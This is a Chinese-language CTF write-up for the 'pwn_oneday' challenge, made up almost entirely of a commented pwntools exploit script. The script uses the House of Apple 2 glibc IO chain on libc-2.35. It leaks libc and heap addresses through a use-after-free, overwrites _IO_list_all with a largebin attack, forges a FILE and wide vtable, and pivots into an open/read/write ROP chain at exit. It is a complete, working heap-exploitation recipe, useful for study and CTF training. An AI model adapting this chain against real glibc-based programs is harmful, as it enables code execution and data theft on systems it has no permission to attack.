house of apple

roderick师傅分享的house of apple是一条很好用的IO调用链,详见:https://bbs.pediy.com/thread-273832.htm

忙里偷闲,拿house of apple调用链做了一下roderick师傅给的例题pwn_oneday,原题给的是libc-2.34,我这里是拿libc-2.35(写作时的最新版)打的,也验证了该调用链在新版glibc上仍然可用,且可以近乎代替之前的IO调用链。注意:下面脚本里的gadget偏移、main_arena相对于_IO_wide_data_0的位置、堆偏移(0x13c0、0x290)等都是针对这一份libc-2.35构建和该题二进制硬编码的,换环境需要重新计算,否则链条会在vtable校验或gadget处直接崩掉。

from pwn import *
# Target is x86-64 Linux; debug logging prints every byte exchanged on the tube,
# which is what you want while a heap/IO exploit is still being lined up.
context.update(os="linux", arch="amd64", log_level="debug")

io = process("./pwn")
# Every raw offset used later (gadgets, main_arena relation) is tied to this exact
# libc build; swapping the file means recomputing them.
libc = ELF("./libc-2.35.so")

def add(choice):
	"""Menu option 1 (add): allocate a chunk of size class `choice`.

	The size each class maps to is decided by the binary, not visible here.
	"""
	io.sendlineafter("enter your command: \n", b'1')
	io.sendlineafter("choise: ", str(choice).encode())

def delete(num):
	"""Menu option 2 (delete): free slot `num`.

	The exploit still show()s and edit()s slots after deleting them, so the target
	evidently leaves the dangling pointer in place (use-after-free).
	"""
	io.sendlineafter("enter your command: \n", b'2')
	io.sendlineafter("Index: \n", str(num).encode())

def edit(num, data):
	"""Menu option 3 (edit): write `data` (bytes) into slot `num`.

	`data` is sent verbatim with sendafter, i.e. no trailing newline, so the
	payload length is exactly len(data).
	"""
	io.sendlineafter("enter your command: \n", b'3')
	io.sendlineafter("Index: ", str(num).encode())
	io.sendafter("Message: \n", data)

def show(num):
	"""Menu option 4 (show): make the target print the contents of slot `num`.

	The caller is responsible for recv()ing the dumped bytes after "Message: \n".
	"""
	io.sendlineafter("enter your command: \n", b'4')
	io.sendlineafter("Index: ", str(num).encode())

if __name__ == '__main__':
	# Exploit flow: leak libc + heap through a freed chunk -> corrupt that freed chunk so a
	# heap pointer ends up in _IO_list_all -> plant a fake FILE (House of Apple 2: real
	# _IO_wfile_jumps vtable plus forged _wide_data/_wide_vtable) -> exit() flushes it and
	# lands in a stack pivot that runs an open/read/write ROP chain.
	# NOTE(review): every raw offset below (gadgets, 0x13c0, 0x290, the main_arena relation)
	# is hard-coded for this binary and this libc-2.35 build; recompute for anything else.
	io.sendlineafter("enter your key >>\n", str(8))   # start-up "key" prompt; 8 is what worked here, its meaning is in the binary
	
	add(2) # 0
	add(1) # 1
	add(1) # 2
	add(1) # 3
	# Free 0 and 2 with 1 still in use between them so they cannot coalesce. The leak below
	# expects both to sit in the unsorted bin, i.e. the size classes must be beyond tcache -- verify.
	delete(0)
	delete(2)
	
	show(0)   # slot 0 is still readable after free (UAF): dumps chunk 0's fd/bk
	io.recvuntil("Message: \n")
	# fd of the freed chunk points at the unsorted-bin head inside main_arena (main_arena + 96).
	# main_arena has no exported symbol, so its offset is expressed as _IO_wide_data_0 + 0x100 --
	# a relation that holds for this build only. libc.address is still 0 here, so
	# libc.sym[...] yields the raw file offset, which is what the subtraction needs.
	libc.address = u64(io.recv(6).ljust(8, b'\x00')) - 96 - libc.sym['_IO_wide_data_0'] - 0x100
	success("libc_address:\t" + hex(libc.address))
	io.recv(2)   # skip the two high zero bytes of fd (the target evidently dumps raw bytes); bk follows
	# bk points at the other freed chunk; 0x13c0 is its hard-coded distance from the heap start.
	heap_base = u64(io.recv(6).ljust(8, b'\x00')) - 0x13c0
	success("heap_base:\t" + hex(heap_base))
	
	# Re-request size class 1: malloc sorts the unsorted chunks, presumably leaving chunk 0 in a
	# large bin and handing chunk 2 back as slot 4 (slot 4 then aliases slot 2). Freeing slot 2
	# again returns that chunk to the unsorted bin -- confirm against the binary's size table.
	add(1) # 4
	delete(2)
	
	# ROP gadgets as raw offsets into this libc-2.35 build -- regenerate (ROPgadget/ropper) for any other libc.
	pop_rdi_ret = libc.address + 0x2da82
	pop_rsi_ret = libc.address + 0x37bca
	pop_rdx_r12_ret = libc.address + 0x1071f1
	
	# Stack-pivot gadget, 26 bytes into svcudp_reply (disassembly below). When reached through the
	# forged __doallocate slot rdi is the fake FILE, so:
	#   rbp = [fake_IO+0x48]      -> rop_address      (payload offset 0x38 below)
	#   rax = [rop_address+0x18]  -> fake_IO - 0x10   (third qword of orw_rop)
	#   call [rax+0x28] = [fake_IO+0x18] -> leave_ret (payload offset 0x08)
	# leave;ret then moves rsp to rop_address+8, i.e. the first gadget of orw_rop.
	# The gadget also stores a zero dword at [rbp+0x10] = rop_address+0x10, so that slot must hold
	# a value we can afford to have zeroed (it is the 0 popped into rdx).
	magic_gadget = libc.sym['svcudp_reply'] + 26
	'''
	mov    rbp,QWORD PTR [rdi+0x48]
	mov    rax,QWORD PTR [rbp+0x18]
	lea    r13,[rbp+0x10]
	mov    DWORD PTR [rbp+0x10],0x0
	mov    rdi,r13
	call   QWORD PTR [rax+0x28]
	'''
	leave_ret = libc.address + 0x52db2
	# Fake FILE = chunk 0's header, assumed to be the first chunk after the 0x290-byte
	# tcache_perthread_struct (nothing else allocated before slot 0 -- verify). The data written
	# by edit(0) therefore starts at fake_IO_addr + 0x10, which every offset below relies on.
	fake_IO_addr = heap_base + 0x290
	# fake_IO + 0x238: exactly where orw_rop lands (payload offset 0x228 + 0x10).
	rop_address = fake_IO_addr + 0xe0 + 0xe8 + 0x70
	
	# open/read/write chain. rop_address itself holds the path, so execution starts at +8.
	orw_rop =  b'./flag\x00\x00'
	orw_rop += p64(pop_rdx_r12_ret) + p64(0) + p64(fake_IO_addr - 0x10)   # rdx = 0; the r12 slot doubles as the pivot gadget's rax source
	orw_rop += p64(pop_rdi_ret) + p64(rop_address)   # rdi = "./flag"
	orw_rop += p64(pop_rsi_ret) + p64(0)             # O_RDONLY
	orw_rop += p64(libc.sym['open'])
	orw_rop += p64(pop_rdi_ret) + p64(3)             # assumes the flag got fd 3 (only stdin/stdout/stderr open) -- TODO confirm
	orw_rop += p64(pop_rsi_ret) + p64(rop_address + 0x100)   # read buffer: scratch space further into the same chunk
	orw_rop += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)     # at most 0x50 bytes; a longer flag is truncated
	orw_rop += p64(libc.sym['read'])
	orw_rop += p64(pop_rdi_ret) + p64(1)
	orw_rop += p64(pop_rsi_ret) + p64(rop_address + 0x100)
	orw_rop += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)
	orw_rop += p64(libc.sym['write'])
    
	# Fake FILE layout, as "payload offset -> struct offset" (payload sits at FILE+0x10):
	#   +0x08 -> FILE+0x18  leave_ret           : fetched by the pivot gadget via [rax+0x28]
	#   +0x18 -> FILE+0x28  _IO_list_all-0x20   : bk_nextsize of the freed chunk -- the classic
	#                                             largebin-attack target value (a heap pointer gets
	#                                             written to _IO_list_all when the next chunk is
	#                                             sorted); also leaves _IO_write_ptr non-zero so
	#                                             the flush walks into _IO_OVERFLOW
	#   +0x38 -> FILE+0x48  rop_address         : rbp for the pivot gadget
	#   +0x90 -> FILE+0xa0  _wide_data          -> fake_IO+0xe0 (forged struct right after the FILE)
	#   +0xc8 -> FILE+0xd8  vtable = _IO_wfile_jumps : a genuine libc vtable, so the vtable range
	#                                             check passes; its overflow handler reaches
	#                                             _wide_data->_wide_vtable->__doallocate
	#   +0x1b0 -> wide_data+0xe0   _wide_vtable -> fake_IO+0x1c8
	#   +0x220 -> wide_vtable+0x68 __doallocate = magic_gadget (wide vtables are not range-checked,
	#                                             which is the whole point of House of Apple)
	#   +0x228 -> orw_rop (== rop_address)
	# _mode (FILE+0xc0, payload+0xb0) stays 0 thanks to the zero padding.
	payload = p64(0) + p64(leave_ret) + p64(0) + p64(libc.sym['_IO_list_all'] - 0x20)
	payload = payload.ljust(0x38, b'\x00') + p64(rop_address)
	payload = payload.ljust(0x90, b'\x00') + p64(fake_IO_addr + 0xe0)
	payload = payload.ljust(0xc8, b'\x00') + p64(libc.sym['_IO_wfile_jumps'])
	payload = payload.ljust(0xd0 + 0xe0, b'\x00') + p64(fake_IO_addr + 0xe0 + 0xe8)
	payload = payload.ljust(0xd0 + 0xe8 + 0x68, b'\x00') + p64(magic_gadget)
	payload += orw_rop
	# Written through freed slot 0 (UAF). 0x880 must not exceed chunk 0's usable size --
	# that size comes from the binary's size table, not from anything visible here.
	edit(0, payload.ljust(0x880, b'\x00'))
	add(3) # 5 -- presumably sorts the re-freed chunk into the large bin, triggering the _IO_list_all write
	add(1) # 6
	# Menu 5 is presumably exit: exit() -> _IO_cleanup -> flush of every FILE reachable from
	# _IO_list_all -> forged vtable path -> magic_gadget -> ROP chain.
	io.sendlineafter("enter your command: \n", b'5')
	io.interactive()